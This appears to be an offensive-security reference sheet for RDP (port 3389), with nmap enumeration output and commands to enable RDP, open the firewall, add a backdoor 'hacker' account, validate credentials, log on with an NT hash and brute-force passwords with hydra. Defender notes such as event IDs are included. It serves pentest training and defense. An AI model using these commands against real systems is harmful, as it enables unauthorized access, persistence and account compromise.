3389 - RDP
Information
Default Port: 3389
PORT STATE SERVICE
3389/tcp open ms-wbt-server
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-06-04T18:13:10+00:00; +8h59m59s from scanner time.
| rdp-ntlm-info:
| Target_Name: TECH
| NetBIOS_Domain_Name: TECH
| NetBIOS_Computer_Name: TECH
| DNS_Domain_Name: TECH
| DNS_Computer_Name: TECH
| Product_Version: 10.0.17763
|_ System_Time: 2026-06-04T18:13:09+00:00
| ssl-cert: Subject: commonName=TECH
| Not valid before: 2026-06-03T18:11:38
|_Not valid after: 2026-12-03T18:11:38
Enumeration
# TCP reachability check: -v verbose, -n skip DNS resolution.
nc -vn 192.168.1.2 3389
# Same check capped at 0.1 s so a filtered port cannot hang the shell. On a slow link this
# window may be too short and a reachable port can look closed.
timeout 0.1 bash -c "nc -nv 192.168.1.2 3389"
# SYN scan of port 3389 only (-sS needs raw-socket privileges).
nmap -p3389 -sS 192.168.1.2
# Version detection plus default NSE scripts (-sV -sC). Produces output like the second listing
# above: rdp-ntlm-info and ssl-cert disclose host name, domain and OS build (10.0.17763) before
# any authentication, so an exposed 3389 gives that information to every scanner.
nmap -p3389 -sVC 192.168.1.2
# Runs every NSE script whose name starts with "rdp-". The pattern selects by name, not by
# category, so scripts outside the default/safe set are included as well.
nmap -p3389 --script="rdp-*" 192.168.1.2
Service
Enable
Remote
# Turn RDP on from a remote host through SMB using the netexec "rdp" module (-M rdp -o action=enable).
# Needs an account with administrative rights on the target; -p authenticates with a password, -H with an NT hash.
netexec smb 192.168.1.2 -u administrator -p <PASSWORD> -M rdp -o action=enable
netexec smb 192.168.1.2 -u administrator -H <HASH> -M rdp -o action=enable
Local
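# enable RDP: fDenyTSConnections=0 accepts Remote Desktop connections (1 refuses them); a change of this value on a host is a useful detection signal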
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
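# firewall: open TCP/3389. The inbound rule is what admits RDP connections; the outbound rule is normally unnecessary because Windows Firewall allows outbound traffic by default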
netsh advfirewall firewall add rule name="RDP Port" protocol=TCP dir=in localport=3389 action=allow
netsh advfirewall firewall add rule name="RDP Port" protocol=TCP dir=out localport=3389 action=allow
# create a local user and add it to the "Remote Desktop Users" group (recorded on the host as Security events 4720 and 4732)
net user hacker Password1 /add
net localgroup "Remote Desktop Users" hacker /add
Disable
Remote
# Turn RDP back off remotely with the same netexec "rdp" module (-o action=disable).
# -p authenticates with a password, -H with an NT hash; administrative rights on the target are needed.
netexec smb 192.168.1.2 -u administrator -p <PASSWORD> -M rdp -o action=disable
netexec smb 192.168.1.2 -u administrator -H <HASH> -M rdp -o action=disable
Local
# disable RDP: fDenyTSConnections=1 refuses new Remote Desktop connections.
# This reverts only the registry value. The "RDP Port" firewall rules and the user added in the
# local Enable steps stay in place until they are removed separately.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
Check Credentials
# Validate a single credential pair against RDP. -p takes a password, -H an NT hash;
# --local-auth checks against the host's local accounts instead of the domain.
# Each run is a real logon attempt: it is typically recorded on the target
# (Event ID 4624 on success, 4625 on failure) and counts toward account lockout.
netexec rdp 192.168.1.2 -u administrator -p <PASSWORD>
netexec rdp 192.168.1.2 -u administrator -p <PASSWORD> --local-auth
netexec rdp 192.168.1.2 -u administrator -H <HASH>
netexec rdp 192.168.1.2 -u administrator -H <HASH> --local-auth
# impacket's rdp_check performs the same validity test, using user:password@host syntax.
# The password is part of argv here, so it is visible in the process list and shell history.
impacket-rdp_check administrator:Password1@192.168.1.2
Connect
# Interactive session with password logon. /cert:ignore accepts any server certificate without
# validation (the host above presents a self-signed commonName=TECH certificate), so an
# interception of the session would go unnoticed. /p: on the command line exposes the password
# in the process list and shell history; xfreerdp prompts for it when /p is omitted.
# +clipboard shares the clipboard between both machines; /dynamic-resolution resizes the remote desktop with the window.
xfreerdp /v:192.168.1.2 /u:administrator /p:Password1 /cert:ignore +clipboard /dynamic-resolution
# Same session authenticated with an NT hash (/pth). Hash-based logon relies on Restricted Admin
# mode being enabled on the target; where it is left disabled this logon is refused.
xfreerdp /v:192.168.1.2 /u:administrator /pth:<HASH> /cert:ignore +clipboard /dynamic-resolution
# Wait 2 seconds, then start the Remmina GUI client in the background with stdout and stderr discarded.
sleep 2; remmina &> /dev/null &
Brute Force
# Password guessing against one account: hydra with 64 parallel tasks (-t 64), a fixed login (-l)
# and a wordlist (-P).
hydra -t 64 -l administrator -P rockyou.txt rdp://192.168.1.2
# netexec does the same when -p is given a file: each line is tried as a password.
# Defender view: both show up on the target as a burst of failed logons (Event ID 4625) from a
# single source address; an account lockout threshold and keeping 3389 off untrusted networks limit it.
netexec rdp 192.168.1.2 -u administrator -p rockyou.txt